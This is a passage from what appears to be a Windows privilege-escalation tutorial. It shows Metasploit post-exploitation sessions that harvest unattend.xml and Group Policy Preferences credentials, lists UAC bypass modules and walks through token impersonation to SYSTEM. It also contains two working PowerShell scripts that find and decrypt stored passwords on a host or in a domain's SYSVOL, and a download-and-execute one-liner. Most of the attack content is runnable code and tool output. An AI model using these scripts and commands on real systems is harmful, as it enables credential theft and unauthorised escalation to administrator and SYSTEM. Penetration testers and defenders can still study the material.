msf6 > use post/windows/gather/enum_unattend 
msf6 post(windows/gather/enum_unattend) > options

Module options (post/windows/gather/enum_unattend):

Name Current Setting Required Description
---- --------------- -------- -----------
GETALL true yes Collect all unattend.xml that are found
SESSION yes The session to run this module on.

msf6 post(windows/gather/enum_unattend) > set session 1
session => 1
msf6 post(windows/gather/enum_unattend) > run

[*] Reading C:\Windows\panther\unattend.xml
[+] Raw version of C:\Windows\panther\unattend.xml saved as: /root/.msf4/loot/20210729010204_default_192.168.1.5_windows.unattend_989482.txt
Unattend Credentials
====================

Type Domain Username Password Groups
---- ------ -------- -------- ------
auto administration
local administration

[+] Unattend Credentials saved as: /root/.msf4/loot/20210729010204_default_192.168.1.5_windows.unattend_206680.txt
[*] Post module execution completed
msf6 post(windows/gather/enum_unattend) >
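The same search and decoding can be done on the host without Metasploit. The following is an added example, not code from the original post or from the enum_unattend module: it checks the directories Windows Setup and sysprep leave answer files in, parses the AutoLogon and LocalAccount sections, and decodes the Base64 form (UTF-16LE with the literal word "Password" appended, which is how Setup stores it when PlainText is false). The function names and the embedded sample XML are mine; it assumes PowerShell 3.0 or later, and treats a missing PlainText element as plain text, which is an assumption on my part.

```powershell
# Added example: locate leftover answer files and decode the credentials in them.
# Not from the original post or from Metasploit's enum_unattend. Assumes PowerShell 3.0+.

function Find-UnattendFile {
    # Paths where Windows Setup and sysprep leave answer files behind
    @(
        "$env:SystemDrive\unattend.xml",
        "$env:windir\Panther\unattend.xml",
        "$env:windir\Panther\Unattended.xml",
        "$env:windir\Panther\Unattend\unattend.xml",
        "$env:windir\Panther\Unattend\Unattended.xml",
        "$env:windir\sysprep\sysprep.xml",
        "$env:windir\sysprep\Panther\unattend.xml",
        "$env:windir\System32\sysprep\unattend.xml",
        "$env:windir\System32\sysprep\Panther\unattend.xml"
    ) | Where-Object { Test-Path -LiteralPath $_ }
}

function ConvertFrom-UnattendPassword {
    param(
        [Parameter(Mandatory)][AllowNull()][AllowEmptyString()][string]$Value,
        [bool]$PlainText = $true
    )
    if ($PlainText) { return $Value }
    try { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Value)) }
    catch { return "<not base64: $Value>" }
    # Setup appends "Password" before encoding; strip it to recover the real value
    if ($decoded.EndsWith('Password')) { $decoded = $decoded.Substring(0, $decoded.Length - 8) }
    return $decoded
}

function Get-UnattendCredential {
    param([Parameter(Mandatory)][xml]$Xml)
    $ns = New-Object System.Xml.XmlNamespaceManager($Xml.NameTable)
    $ns.AddNamespace('u', 'urn:schemas-microsoft-com:unattend')

    # Reads <Password><Value/><PlainText/></Password> under a node.
    # Assumption: a missing <PlainText> element is treated as plain text.
    $readPassword = {
        param($node)
        $pw = $node.SelectSingleNode('u:Password', $ns)
        if (-not $pw) { return $null }
        $flag = $pw.SelectSingleNode('u:PlainText', $ns)
        $isPlain = (-not $flag) -or ($flag.InnerText -ne 'false')
        ConvertFrom-UnattendPassword -Value $pw.SelectSingleNode('u:Value', $ns).InnerText -PlainText $isPlain
    }

    foreach ($al in $Xml.SelectNodes('//u:AutoLogon', $ns)) {
        [PSCustomObject]@{
            Type     = 'AutoLogon'
            Domain   = $al.SelectSingleNode('u:Domain', $ns).InnerText
            Username = $al.SelectSingleNode('u:Username', $ns).InnerText
            Group    = ''
            Password = & $readPassword $al
        }
    }
    foreach ($acct in $Xml.SelectNodes('//u:LocalAccount', $ns)) {
        [PSCustomObject]@{
            Type     = 'LocalAccount'
            Domain   = ''
            Username = $acct.SelectSingleNode('u:Name', $ns).InnerText
            Group    = $acct.SelectSingleNode('u:Group', $ns).InnerText
            Password = & $readPassword $acct
        }
    }
}

# Constructed sample (not from any real host): the AutoLogon value is the Base64 of
# "P@ssw0rd!Password" in UTF-16LE, the local account password is stored in plain text.
$sample = @'
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64">
      <AutoLogon>
        <Password>
          <Value>UABAAHMAcwB3ADAAcgBkACEAUABhAHMAcwB3AG8AcgBkAA==</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount>
            <Password>
              <Value>Summer2021!</Value>
              <PlainText>true</PlainText>
            </Password>
            <Group>Administrators</Group>
            <Name>svc_deploy</Name>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
'@

Get-UnattendCredential -Xml ([xml]$sample) | Format-Table -AutoSize
foreach ($file in Find-UnattendFile) {
    "== $file"
    Get-UnattendCredential -Xml ([xml](Get-Content -LiteralPath $file)) | Format-Table -AutoSize
}
```

Against the constructed sample this recovers Administrator / P@ssw0rd! from the AutoLogon block and svc_deploy / Summer2021! from the local account; on a real host it then prints the same table for every answer file it finds. The namespace manager is required because unattend files declare a default namespace, which plain XPath such as //AutoLogon silently fails to match.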

5. Checking scheduled tasks

schtasks /query /fo LIST /v

Using AccessChk

accesschk.exe /accepteula    # accept the licence on first use; otherwise a dialog pops up
accesschk.exe -dqv "C:\Windows"    # show the permissions on a directory
accesschk.exe -uwdqs Users c:\*.*    # list every directory under the drive that Users can write to
accesschk.exe -uwdqs "Authenticated Users" c:\*.*    # the same for Authenticated Users

0x03. Group Policy Preferences privilege escalation

1. Obtaining Group Policy credentials (SYSVOL/GPP)

Group Policy Preferences can embed account passwords in XML files under SYSVOL (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml) as a cpassword attribute, encrypted with an AES key that Microsoft published. Every domain user can read SYSVOL, so any cpassword that exists is recoverable; MS14-025 stopped new ones from being created but did not remove existing files.

01. Getting cpassword with PowerShell

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('.\Get-GPPPassword.ps1');Get-GPPPassword"

02. Getting it with msf

msf6 > use post/windows/gather/credentials/gpp 
msf6 post(windows/gather/credentials/gpp) > options

Module options (post/windows/gather/credentials/gpp):

Name Current Setting Required Description
---- --------------- -------- -----------
ALL true no Enumerate all domains on network.
DOMAINS no Enumerate list of space separated domains DOMAINS="dom1 dom2".
SESSION yes The session to run this module on.
STORE true no Store the enumerated files in loot.

msf6 post(windows/gather/credentials/gpp) > set session 1
session => 1
msf6 post(windows/gather/credentials/gpp) > run

[*] Checking for group policy history objects...
[-] Error accessing C:\ProgramData\Microsoft\Group Policy\History : stdapi_fs_ls: Operation failed: The system cannot find the path specified.
[*] Checking for SYSVOL locally...
[-] Error accessing C:\Windows\SYSVOL\sysvol : stdapi_fs_ls: Operation failed: The system cannot find the path specified.
[*] Enumerating Domains on the Network...
[*] Retrieved Domain(s) JIYE, WORKGROUP from network
[*] Enumerating domain information from the local registry...
[*] Retrieved Domain(s) JIYE from registry
[*] Retrieved DC DC.JIYE.NET from registry
[*] Enumerating DCs for JIYE on the network...
[-] No Domain Controllers found for JIYE
[*] Searching for Policy Share on DC.JIYE.NET...
[-] Error accessing \\DC.JIYE.NET\SYSVOL : stdapi_fs_ls: Operation failed: The network path was not found.
[*] Searching for Group Policy XML Files...
[*] Post module execution completed
msf6 post(windows/gather/credentials/gpp) >
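To show why cpassword is recoverable at all, here is an added example, not code from the original post or from Get-GPPPassword: it decrypts cpassword values with the AES-256 key published in MS-GPPREF (CBC mode, all-zero IV, PKCS7 padding, UTF-16LE plaintext, Base64 with its padding stripped), and walks a Policies tree for every preference XML that carries one. Since the key is public, the same code can encrypt, which is how the constructed sample below is produced, so the block runs stand-alone without touching a domain. The function names and the sample Groups.xml are mine; the DC name in the commented call is taken from the msf output above purely for illustration, and PowerShell 3.0 or later is assumed.

```powershell
# Added example: decrypt GPP cpassword values with the key Microsoft published in
# MS-GPPREF and search a SYSVOL tree for them. Not from the original post or from
# Get-GPPPassword. Assumes PowerShell 3.0+.

# 32-byte AES key from MS-GPPREF 2.2.1.1.4; it is the same on every domain, which is the problem
$GppKey = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                   0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

function New-GppAes {
    $aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider
    $aes.Key     = $GppKey
    $aes.IV      = New-Object byte[] 16   # all-zero IV, CBC, PKCS7: what GPMC uses
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes
}

function ConvertFrom-GppPassword {
    param([Parameter(Mandatory)][string]$CPassword)
    # GPMC strips the Base64 '=' padding; restore it before decoding
    $padded = $CPassword + ('=' * ((4 - $CPassword.Length % 4) % 4))
    $cipher = [Convert]::FromBase64String($padded)
    $plain  = (New-GppAes).CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    [Text.Encoding]::Unicode.GetString($plain)   # plaintext is UTF-16LE
}

function ConvertTo-GppPassword {
    # Inverse operation; used here only to build the constructed sample below
    param([Parameter(Mandatory)][string]$Password)
    $bytes  = [Text.Encoding]::Unicode.GetBytes($Password)
    $cipher = (New-GppAes).CreateEncryptor().TransformFinalBlock($bytes, 0, $bytes.Length)
    ([Convert]::ToBase64String($cipher)).TrimEnd('=')
}

function Get-GppCredentialFromXml {
    param([Parameter(Mandatory)][xml]$Xml, [string]$Source = '<constructed>')
    # Whatever the preference type (Groups, Services, ScheduledTasks, DataSources,
    # Drives, Printers), the secret is a cpassword attribute on a Properties element
    foreach ($p in $Xml.SelectNodes('//Properties[@cpassword]')) {
        $user = $p.GetAttribute('userName')
        if (-not $user) { $user = $p.GetAttribute('accountName') }   # Services.xml
        if (-not $user) { $user = $p.GetAttribute('runAs') }         # ScheduledTasks.xml
        [PSCustomObject]@{
            Source   = $Source
            User     = $user
            NewName  = $p.GetAttribute('newName')
            Password = ConvertFrom-GppPassword -CPassword $p.GetAttribute('cpassword')
        }
    }
}

function Find-GppCredential {
    # $Root is normally \\<dc>\SYSVOL\<domain>\Policies; a local copy of the tree works too
    param([Parameter(Mandatory)][string]$Root)
    $names = 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Drives.xml','Printers.xml'
    Get-ChildItem -Path $Root -Recurse -Include $names -ErrorAction SilentlyContinue | ForEach-Object {
        Get-GppCredentialFromXml -Xml ([xml](Get-Content -LiteralPath $_.FullName)) -Source $_.FullName
    }
}

# Constructed sample Groups.xml (attributes that do not matter here are omitted);
# the cpassword is produced with the public key, exactly as GPMC would
$sampleCPassword = ConvertTo-GppPassword -Password 'Local*P4ssword!'
$sampleXml = @"
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="backup_admin" changed="2021-07-27 08:00:00">
    <Properties action="U" newName="" userName="backup_admin" cpassword="$sampleCPassword" neverExpires="1"/>
  </User>
</Groups>
"@
Get-GppCredentialFromXml -Xml ([xml]$sampleXml) | Format-Table -AutoSize

# Against a live domain (illustrative path; the DC name comes from the msf output above):
# Find-GppCredential -Root '\\DC.JIYE.NET\SYSVOL\JIYE.NET\Policies' | Format-Table -AutoSize
```

The sample round-trips to Local*P4ssword! for backup_admin. The padding repair matters in practice: GPMC writes the Base64 without trailing "=", and [Convert]::FromBase64String rejects it otherwise. The msf module above found nothing because \\DC.JIYE.NET\SYSVOL could not be reached from the session; the Find-GppCredential call has the same requirement, or you copy the Policies tree down first.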

0x04. UAC bypass privilege escalation (msf)

Prerequisites:

1. The current user must be a member of the local Administrators group (a UAC bypass only removes the consent prompt; it does not grant rights the user does not already hold).
2. UAC is at its default level, "Notify me only when programs try to make changes to my computer" (at "Always notify" the auto-elevation these modules abuse is disabled).

msf's bypassuac modules:

#   Name                                                   Disclosure Date  Rank       Check  Description
-   ----                                                   ---------------  ----       -----  -----------
0   exploit/windows/local/bypassuac_windows_store_filesys  2019-08-22       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)
1   exploit/windows/local/bypassuac_windows_store_reg      2019-02-19       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry
2   exploit/windows/local/bypassuac                        2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
3   exploit/windows/local/bypassuac_injection              2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
4   exploit/windows/local/bypassuac_injection_winsxs       2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
5   exploit/windows/local/bypassuac_vbs                    2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
6   exploit/windows/local/bypassuac_comhijack              1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
7   exploit/windows/local/bypassuac_eventvwr               2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
8   exploit/windows/local/bypassuac_sdclt                  2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)
9   exploit/windows/local/bypassuac_silentcleanup          2019-02-24       excellent  No     Windows Escalate UAC Protection Bypass (Via SilentCleanup)
10  exploit/windows/local/bypassuac_dotnet_profiler        2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via dot net profiler)
11  exploit/windows/local/bypassuac_fodhelper              2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
12  exploit/windows/local/bypassuac_sluihijack             2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)

0x05. Token stealing

1. Stealing tokens with msf

Once you have a Meterpreter session, load the incognito extension. Note from the output below that it works here because the session already runs as JIYE\Administrator, so the SYSTEM delegation token of a process it can open is listed; from a standard-user session that token would not appear. This is a step from Administrator to SYSTEM, not a bypass of UAC or of standard-user restrictions.

meterpreter > getuid
Server username: JIYE\Administrator
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
JIYE\Administrator
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
No tokens available

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
------------- Short note, long regards; see you next time -------------